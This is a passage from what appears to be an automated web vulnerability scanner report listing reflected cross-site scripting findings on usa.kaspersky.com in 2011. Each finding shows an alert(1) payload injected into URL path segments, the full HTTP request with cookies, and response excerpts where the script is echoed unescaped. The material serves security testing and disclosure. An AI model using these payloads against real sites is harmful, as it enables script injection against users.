Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.5.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Search%20%7C%20Search%20Results; ev5=far%2Bhelp%2Bvirus; s_nr=1315139085816-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fnode%25252F17007%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:37:26 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139846"
Content-Type: text/html; charset=utf-8
Content-Length: 37147
Date: Sun, 04 Sep 2011 12:37:38 GMT
X-Varnish: 1163074387
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files/204x50_product_6.jpg15c98"><script>alert(1)</script>740b9641b5a?1312840706" />
...[SNIP]...

1.199. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/204x50_product_6.jpg [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/204x50_product_6.jpg

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e7f5"-alert(1)-"49acdc67907 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.com/files/204x50_product_6.jpg3e7f5"-alert(1)-"49acdc67907?1312840706 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/products-services/home-computer-security/internet-security
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.5.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Search%20%7C%20Search%20Results; ev5=far%2Bhelp%2Bvirus; s_nr=1315139085816-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fnode%25252F17007%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:39:12 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139952"
Content-Type: text/html; charset=utf-8
Content-Length: 40718
Date: Sun, 04 Sep 2011 12:39:28 GMT
X-Varnish: 1163077255
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
= s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files/204x50_product_6.jpg3e7f5"-alert(1)-"49acdc67907?1312840706";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.200. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/718x96_Store-2012Promo.jpg [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/718x96_Store-2012Promo.jpg

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f5c2"-alert(1)-"ee985bf493c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites6f5c2"-alert(1)-"ee985bf493c/usa.kaspersky.com/files/718x96_Store-2012Promo.jpg?1311949149 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/store/kaspersky-store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; NO_CACHE=Y; s_cc=true; intcamp=INT1673886; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.3.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); slider_session=yes; gpv_pageName=Search%20%7C%20Search%20Results; ev5=xss; s_nr=1315139065855-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253DSearch%2526oidt%253D3%2526ot%253DSUBMIT; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:30:36 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139436"
Content-Type: text/html; charset=utf-8
Content-Length: 29693
Date: Sun, 04 Sep 2011 12:30:43 GMT
X-Varnish: 1163063549
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites6f5c2"-alert(1)-"ee985bf493c/usa.kaspersky.com/files/718x96_Store-2012Promo.jpg?1311949149";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.201. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/718x96_Store-2012Promo.jpg [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/718x96_Store-2012Promo.jpg

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67846"><script>alert(1)</script>be65bc9e9b4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites67846"><script>alert(1)</script>be65bc9e9b4/usa.kaspersky.com/files/718x96_Store-2012Promo.jpg?1311949149 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/store/kaspersky-store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; NO_CACHE=Y; s_cc=true; intcamp=INT1673886; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.3.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); slider_session=yes; gpv_pageName=Search%20%7C%20Search%20Results; ev5=xss; s_nr=1315139065855-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253DSearch%2526oidt%253D3%2526ot%253DSUBMIT; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:29:54 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139394"
Content-Type: text/html; charset=utf-8
Content-Length: 29748
Date: Sun, 04 Sep 2011 12:30:10 GMT
X-Varnish: 1163062433
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites67846"><script>alert(1)</script>be65bc9e9b4/usa.kaspersky.com/files/718x96_Store-2012Promo.jpg?1311949149" />
...[SNIP]...

1.202. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/718x96_Store-2012Promo.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/718x96_Store-2012Promo.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2f93"-alert(1)-"88344e1a75c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.comc2f93"-alert(1)-"88344e1a75c/files/718x96_Store-2012Promo.jpg?1311949149 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/store/kaspersky-store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; NO_CACHE=Y; s_cc=true; intcamp=INT1673886; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.3.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); slider_session=yes; gpv_pageName=Search%20%7C%20Search%20Results; ev5=xss; s_nr=1315139065855-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253DSearch%2526oidt%253D3%2526ot%253DSUBMIT; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:32:18 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139538"
Content-Type: text/html; charset=utf-8
Content-Length: 29693
Date: Sun, 04 Sep 2011 12:32:48 GMT
X-Varnish: 1163066182
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
" Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.comc2f93"-alert(1)-"88344e1a75c/files/718x96_Store-2012Promo.jpg?1311949149";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.203. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/718x96_Store-2012Promo.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/718x96_Store-2012Promo.jpg

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b92f7"><script>alert(1)</script>e64a1e12636 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.comb92f7"><script>alert(1)</script>e64a1e12636/files/718x96_Store-2012Promo.jpg?1311949149 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/store/kaspersky-store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; NO_CACHE=Y; s_cc=true; intcamp=INT1673886; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.3.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); slider_session=yes; gpv_pageName=Search%20%7C%20Search%20Results; ev5=xss; s_nr=1315139065855-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253DSearch%2526oidt%253D3%2526ot%253DSUBMIT; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:31:53 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139513"
Content-Type: text/html; charset=utf-8
Content-Length: 29748
Date: Sun, 04 Sep 2011 12:31:59 GMT
X-Varnish: 1163065446
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.comb92f7"><script>alert(1)</script>e64a1e12636/files/718x96_Store-2012Promo.jpg?1311949149" />
...[SNIP]...

1.204. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/718x96_Store-2012Promo.jpg [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/718x96_Store-2012Promo.jpg

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0fce"-alert(1)-"d5f511604d2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.com/filesc0fce"-alert(1)-"d5f511604d2/718x96_Store-2012Promo.jpg?1311949149 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/store/kaspersky-store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; NO_CACHE=Y; s_cc=true; intcamp=INT1673886; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.3.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); slider_session=yes; gpv_pageName=Search%20%7C%20Search%20Results; ev5=xss; s_nr=1315139065855-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253DSearch%2526oidt%253D3%2526ot%253DSUBMIT; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:35:16 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139716"
Content-Type: text/html; charset=utf-8
Content-Length: 29693
Date: Sun, 04 Sep 2011 12:35:25 GMT
X-Varnish: 1163070902
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
nk You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/filesc0fce"-alert(1)-"d5f511604d2/718x96_Store-2012Promo.jpg?1311949149";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.205. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/718x96_Store-2012Promo.jpg [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/718x96_Store-2012Promo.jpg

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c39c"><script>alert(1)</script>b20d160fad6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files7c39c"><script>alert(1)</script>b20d160fad6/718x96_Store-2012Promo.jpg?1311949149 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/store/kaspersky-store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; NO_CACHE=Y; s_cc=true; intcamp=INT1673886; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.3.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); slider_session=yes; gpv_pageName=Search%20%7C%20Search%20Results; ev5=xss; s_nr=1315139065855-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253DSearch%2526oidt%253D3%2526ot%253DSUBMIT; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:34:00 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139640"
Content-Type: text/html; charset=utf-8
Content-Length: 29748
Date: Sun, 04 Sep 2011 12:34:23 GMT
X-Varnish: 1163069001
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files7c39c"><script>alert(1)</script>b20d160fad6/718x96_Store-2012Promo.jpg?1311949149" />
...[SNIP]...

1.206. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/718x96_Store-2012Promo.jpg [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/718x96_Store-2012Promo.jpg

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3abf7"-alert(1)-"9b7583af2f7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.com/files/718x96_Store-2012Promo.jpg3abf7"-alert(1)-"9b7583af2f7?1311949149 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/store/kaspersky-store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; NO_CACHE=Y; s_cc=true; intcamp=INT1673886; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.3.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); slider_session=yes; gpv_pageName=Search%20%7C%20Search%20Results; ev5=xss; s_nr=1315139065855-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253DSearch%2526oidt%253D3%2526ot%253DSUBMIT; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:37:24 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139844"
Content-Type: text/html; charset=utf-8
Content-Length: 36780
Date: Sun, 04 Sep 2011 12:37:36 GMT
X-Varnish: 1163074316
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
rop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files/718x96_Store-2012Promo.jpg3abf7"-alert(1)-"9b7583af2f7?1311949149";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.207. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/718x96_Store-2012Promo.jpg [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/718x96_Store-2012Promo.jpg

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95dba"><script>alert(1)</script>e48d751b1d4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files/718x96_Store-2012Promo.jpg95dba"><script>alert(1)</script>e48d751b1d4?1311949149 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/store/kaspersky-store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; NO_CACHE=Y; s_cc=true; intcamp=INT1673886; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.3.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); slider_session=yes; gpv_pageName=Search%20%7C%20Search%20Results; ev5=xss; s_nr=1315139065855-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253DSearch%2526oidt%253D3%2526ot%253DSUBMIT; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:36:51 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139811"
Content-Type: text/html; charset=utf-8
Content-Length: 32544
Date: Sun, 04 Sep 2011 12:37:00 GMT
X-Varnish: 1163073101
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files/718x96_Store-2012Promo.jpg95dba"><script>alert(1)</script>e48d751b1d4?1311949149" />
...[SNIP]...

1.208. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d226"-alert(1)-"5cbfac5401b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites7d226"-alert(1)-"5cbfac5401b/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:19:59 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138799"
Content-Type: text/html; charset=utf-8
Content-Length: 33731
Date: Sun, 04 Sep 2011 12:20:01 GMT
X-Varnish: 1163045797
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

